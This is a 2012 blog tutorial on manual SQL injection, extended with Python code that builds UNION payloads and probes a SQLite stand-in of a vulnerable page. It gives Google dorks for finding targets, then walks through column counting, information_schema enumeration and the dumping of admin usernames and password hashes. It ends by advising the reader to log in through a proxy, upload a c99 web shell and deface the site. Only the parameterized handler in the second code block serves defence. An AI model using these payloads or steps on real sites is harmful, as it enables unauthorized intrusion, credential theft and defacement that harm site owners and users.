
Wednesday, 11 April 2012

Manual SQL Injection

[TUT] Manual SQL Injection [TUT]
//******************************************************************//
//***********************SQL INJECTION******************************//
//******************************************************************//




1.Introduction

---->At present the majority of websites are dynamic, i.e. they use a database such as MS Access, MySQL, MS SQL Server or Oracle to store information about the site's users and the other content the site shows. The database is the heart of a modern website. In my experience a PHP website will most often use MySQL and sometimes MS Access, while an ASP website will use MS SQL Server.



2.What is sql injection?

---->In short and plain language, SQL injection is the technique of reading or modifying a website's database, through the site's own queries, without having any administrator rights.



3.Checking for vulnerability

---->To find candidate websites, type one of the following into Google:
inurl:.php?id=
inurl:.php?product_id= (I personally recommend this one, as the resulting websites are probably online shops)
site:.(top-level domain of a particular country) inurl:.php?id=


Now suppose you got a site like :- http://www.victim.com/news.php?id=4

To check whether it is vulnerable, simply add a single quote ' at the end of the URL, so it becomes :- http://www.victim.com/news.php?id=4'

If the site is not vulnerable it filters the quote (or rejects the value) and the page loads normally. If it is vulnerable the unbalanced quote breaks the query and the page shows a database error such as

-"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1"

Even when no error is printed, a page whose content changes (a missing article, an empty block where the text used to be) may still be vulnerable, so observe the page closely.



4.Find the number of columns

---->Note: -- (it must be followed by a space, so in a URL write --+ or -- - to make sure the space survives), # or /* comments out the rest of the query. A ; only helps where stacked queries are allowed, and PHP's mysql_query() does not allow them.

To find the number of columns use the ORDER BY clause.

The URL will look like :- http://www.victim.com/news.php?id=4 order by 1-- (no error)
So I increase it to 2, and the query looks like :- http://www.victim.com/news.php?id=4 order by 2-- (no error)
Keep incrementing the ORDER BY number by 1 until it gives an error. In my case I got the error at http://www.victim.com/news.php?id=4 order by 4--
So there are three columns: ORDER BY n fails as soon as n is larger than the number of columns in the original SELECT.



5.Find which column contains data of our interest

---->For this we will use the UNION operator. A UNION only works when both SELECTs have the same number of columns, which is why step 4 comes first.

Since we have 3 columns our query will look like :- http://www.victim.com/news.php?id=-4 union all select 1,2,3--
Note: check the URL, I have used a minus sign after "id=". The original query then matches no row, so the page renders only the row our UNION adds, with the marker numbers in place of the article's picture, title and text.

Observe the page: the numbers you see are the columns whose values are printed on the page. There may be more than one, which is fine, you can use any one of them.

Suppose in my case I got 2.



6.Checking the database version

---->We will use @@version for this

Since column 2 is the one displayed our query will be :- http://www.victim.com/news.php?id=-4 union all select 1,@@version,3--
This prints the MySQL version. Sometimes it gives an error instead (usually a collation mismatch between the two SELECTs); then use unhex(hex(@@version)) in place of @@version. Remember, if you needed the unhex(hex()) wrapper here you will need it on every later query too.

The version will be 4 (or below) or 5 (or above). I will discuss the injection for version 5 and for version 4 separately.



----------------------------------------------------------------MySql version 5------------------------------------------------------------------------------



7.Getting the right table name

---->This version has a useful built-in database called information_schema, whose tables describe every table and column on the server.

Our query :- http://www.victim.com/news.php?id=-4 union all select 1,table_name,3 from information_schema.tables--
This selects every table name in the database, but the page usually has room for one row, so it will display only one table name.

In this case we use LIMIT 0,1 :- http://www.victim.com/news.php?id=-4 union all select 1,table_name,3 from information_schema.tables limit 0,1--
Keep incrementing the LIMIT offset by 1, i.e. limit 1,1, limit 2,1 and so on, until we get the desired table name. The first rows belong to information_schema itself; adding where table_schema=database() before the LIMIT lists only the site's own tables.

And yes, if you had to use unhex(hex()) while finding the version, you will have to use unhex(hex(table_name)) here.

Suppose in our case the desired table name is admin



8.Getting all the column names of the table which we got in step 7

---->Similarly, for the column names our query will look like

http://www.victim.com/news.php?id=-4 union all select 1,column_name,3 from information_schema.columns where table_name=char(97,100,109,105,110)--
Remember to convert the table name into its ASCII codes with char(): 97,100,109,105,110 is "admin". Written this way the payload contains no quote characters, so it still works when the site escapes quotes.

Use LIMIT if necessary, exactly as in step 7.

Suppose we got the column names :- id,username,password



9.Retrieving the data from the table

---->Now we will get the data of those columns from the table

For the username our query :- http://www.victim.com/news.php?id=-4 union all select 1,username,3 from admin--
This gives the username; let it be admin

For the password our query :- http://www.victim.com/news.php?id=-4 union all select 1,password,3 from admin--
This gives the password either in plain text or, often, as an MD5 or SHA1 hash such as 9F14974D57DE204E37C11AEAC3EE4940. A hash cannot be decrypted; it has to be cracked. Search for the hash online or run a cracking tool against it.

To combine the data of all columns in one query we use the concat() function, as follows (add limit n,1 again if the table has more than one row)

http://www.victim.com/news.php?id=-4 union all select 1,concat(id,0x3a,username,0x3a,password),3 from admin--
Note: 0x3a is the hex code of the colon (:), used here as a separator

This will give the data in the form 1:admin:9F14974D57DE204E37C11AEAC3EE4940
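The payloads of steps 6 to 9, generated by a small helper. This is an added example, not code from the original post: the column count 3, the displayed column 2, the negative id, the table admin and its columns are the values assumed in the text above; the "-- -" terminator, the table_schema=database() filter and the hex_literal() alternative to char() are my additions. Nothing here talks to a server; it only builds the value of the id parameter and the resulting URL.

```python
"""Added example: builds the MySQL 5 UNION payloads of steps 6 to 9 as the
value of the id parameter. Assumptions: 3 columns, column 2 is displayed,
the vulnerable page is news.php?id=. Hypothetical helper, not the post's code."""
from urllib.parse import quote

COLS = 3              # column count found with ORDER BY (step 4)
REFLECTED = 2         # column whose value appears on the page (step 5)
BASE_ID = "-4"        # negative id: the real row is not found, only the UNION row renders
TERMINATOR = "-- -"   # MySQL treats -- as a comment only when whitespace follows;
                      # the trailing "-" keeps that space from being trimmed in a URL


def char_literal(s: str) -> str:
    """char(97,100,...) form of a string: no quote characters, so quote escaping is irrelevant."""
    return "char(" + ",".join(str(ord(c)) for c in s) + ")"


def hex_literal(s: str) -> str:
    """0x... form; MySQL accepts it as a string literal (0x3a is the ':' separator of step 9)."""
    return "0x" + s.encode().hex()


def union_select(expr: str, tail: str = "", wrap: bool = False) -> str:
    """Put expr in the displayed column of a UNION row and terminate the query."""
    if wrap:                                   # the unhex(hex()) trick from step 6
        expr = f"unhex(hex({expr}))"
    cells = [str(i) for i in range(1, COLS + 1)]
    cells[REFLECTED - 1] = expr
    payload = f"{BASE_ID} union all select {','.join(cells)}"
    if tail:
        payload += " " + tail
    return payload + TERMINATOR


def version_payload(wrap: bool = False) -> str:
    """Step 6: print @@version in the displayed column."""
    return union_select("@@version", wrap=wrap)


def table_payload(offset: int, own_db: bool = False, wrap: bool = False) -> str:
    """Step 7: one table name per request, paged with LIMIT offset,1.
    own_db=True skips the information_schema/mysql tables via table_schema=database()."""
    where = " where table_schema=database()" if own_db else ""
    return union_select("table_name",
                        f"from information_schema.tables{where} limit {offset},1", wrap)


def column_payload(table: str, offset: int, wrap: bool = False) -> str:
    """Step 8: column names of one table, the table name encoded with char()."""
    tail = (f"from information_schema.columns where table_name={char_literal(table)}"
            f" limit {offset},1")
    return union_select("column_name", tail, wrap)


def dump_payload(table: str, columns: list, offset: int) -> str:
    """Step 9: concat() every wanted column with 0x3a (':') so one row carries them all."""
    expr = "concat(" + ",0x3a,".join(columns) + ")"
    return union_select(expr, f"from {table} limit {offset},1")


def inject_url(base_url: str, param: str, value: str) -> str:
    """URL-encode the payload: spaces become %20, commas and parentheses stay readable."""
    return f"{base_url}?{param}={quote(value, safe='=,()@')}"


if __name__ == "__main__":
    base = "http://www.victim.com/news.php"
    print(inject_url(base, "id", version_payload()))
    for off in range(3):                       # page through the site's own tables
        print(inject_url(base, "id", table_payload(off, own_db=True)))
    print(inject_url(base, "id", column_payload("admin", 0)))
    print(inject_url(base, "id", dump_payload("admin", ["id", "username", "password"], 0)))
```

If the version query only works with wrap=True, pass wrap=True to every later call as well, exactly as the text says; the dump query needs no wrapper because concat() already yields a string.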

----------------------------------------------------------------End of version 5-----------------------------------------------------------------------------



----------------------------------------------------------------MySql version 4------------------------------------------------------------------------------

Now say your victim has MySQL version 4: you cannot get the column and table names as in version 5, because this version does not have the information_schema database.

So you will have to guess the table name and column name until you stop getting an error. Success depends on luck, hard work and experience.

http://www.victim.com/news.php?id=-4 union all select 1,2,3 from admin--
Here I guessed the table name admin but I got an error, because no table with this name exists

Next I try the table name tbluser :- http://www.victim.com/news.php?id=-4 union all select 1,2,3 from tbluser--
If the page loads normally, the table tbluser exists. The most common table names are admin, users, tbl_admin, tbluser, companyname_user, etc.

In the same way you have to guess the column names, putting each guess in the displayed column, until you stop getting errors.

Success depends on luck, so either try hard or leave it
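The probing loops of steps 3 to 5 and the table guessing of the version-4 path, as one added example that is not part of the original post. Because it has to run offline, the MySQL-backed news.php is replaced by a SQLite stand-in with a constructed news table and a constructed tbluser table; the vulnerable handler glues the id parameter into the query exactly the way the text assumes, and a parameterized variant sits beside it so the same probes can be run against both. The marker numbers 1001..1003 and the candidate table list are my choices, not the post's.

```python
"""Added example: SQLite stand-in for the vulnerable news.php plus the probing
loops of steps 3 to 5 and the version-4 table guessing. Tables, rows, markers
and candidate names are constructed for this example; MySQL's error text and
information_schema differ, but the UNION and ORDER BY behaviour is the same."""
import sqlite3

db = sqlite3.connect(":memory:")
db.executescript("""
CREATE TABLE news(id INTEGER, title TEXT, body TEXT);
INSERT INTO news VALUES (4, 'Shop launched', 'Welcome to our online shop.');
CREATE TABLE tbluser(id INTEGER, username TEXT, password TEXT);
INSERT INTO tbluser VALUES (1, 'admin', '9F14974D57DE204E37C11AEAC3EE4940');
""")


def news_page(id_param: str) -> str:
    """The flaw: the raw id parameter is pasted into the SQL text, like
    mysql_query("SELECT ... WHERE id=" . $_GET['id']) in an old PHP page."""
    sql = "SELECT id, title, body FROM news WHERE id=" + id_param
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return f"<p>SQL error: {exc}</p>"           # the verbose error of step 3
    if row is None:
        return "<p>No such article</p>"
    return f"<h1>{row[1]}</h1><div>{row[2]}</div>"   # only columns 2 and 3 reach the page


def news_page_safe(id_param: str) -> str:
    """Same page with a bound parameter: the input is always a value, never SQL."""
    try:
        article_id = int(id_param)
    except ValueError:
        return "<p>Bad id</p>"
    row = db.execute("SELECT id, title, body FROM news WHERE id=?", (article_id,)).fetchone()
    return "<p>No such article</p>" if row is None else f"<h1>{row[1]}</h1><div>{row[2]}</div>"


def is_error(page: str) -> bool:
    return "SQL error" in page


def quote_probe(fetch, base="4") -> str:
    """Step 3: a lone quote breaks the query. 'error' is the strong signal;
    'changed' is the weak one the text says to look at closely."""
    normal, probed = fetch(base), fetch(base + "'")
    if is_error(probed):
        return "error"
    return "changed" if probed != normal else "same"


def count_columns(fetch, base="4", max_cols=20):
    """Step 4: raise ORDER BY n until the database complains; the count is n-1.
    The terminator keeps its trailing space because MySQL requires it after --."""
    for n in range(1, max_cols + 2):
        if is_error(fetch(f"{base} order by {n}-- ")):
            return n - 1
    return None                                      # never errored: probably not injectable


def reflected_columns(fetch, ncols, base="-4"):
    """Step 5: UNION a row of markers with a negative id so only our row renders.
    Unusual integers instead of 1,2,3 avoid false hits on things like '<h1>'."""
    markers = [str(1000 + i) for i in range(1, ncols + 1)]
    page = fetch(f"{base} union all select {','.join(markers)}-- ")
    return [i for i, m in enumerate(markers, 1) if m in page]


def guess_tables(fetch, ncols, candidates, base="-4"):
    """Version-4 path: selecting from a table that does not exist errors,
    a normal page means the guess was right."""
    cells = ",".join(str(i) for i in range(1, ncols + 1))
    return [t for t in candidates
            if not is_error(fetch(f"{base} union all select {cells} from {t}-- "))]


if __name__ == "__main__":
    for name, fetch in (("vulnerable", news_page), ("parameterized", news_page_safe)):
        print(name, "quote probe:", quote_probe(fetch), "columns:", count_columns(fetch))
    print("displayed columns:", reflected_columns(news_page, 3))
    print("existing tables:", guess_tables(news_page, 3, ["admin", "users", "tbl_admin", "tbluser"]))
```

Against the vulnerable handler the quote probe errors, ORDER BY 4 is the first failure (so three columns), columns 2 and 3 turn out to be displayed, and only tbluser survives the guessing loop; against the parameterized handler the ORDER BY loop never sees a database error, which is the check to run before spending time on a target.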

----------------------------------------------------------------End of version 4-----------------------------------------------------------------------------


10.What to do next

---->Just log in with the username and password you got, via the site's login tab or its admin panel if it has one. Use a proxy when you log in.

Next check whether there is any upload option, such as an image upload for an item, product or whatever. If there is one and it does not validate the type of file you upload, you can upload your shell from there.

For PHP I recommend the c99 shell. From this shell you can change the index (home) page of the victim website.

That's it, you have completely defaced the website. Enjoy!



//******************************************************************//
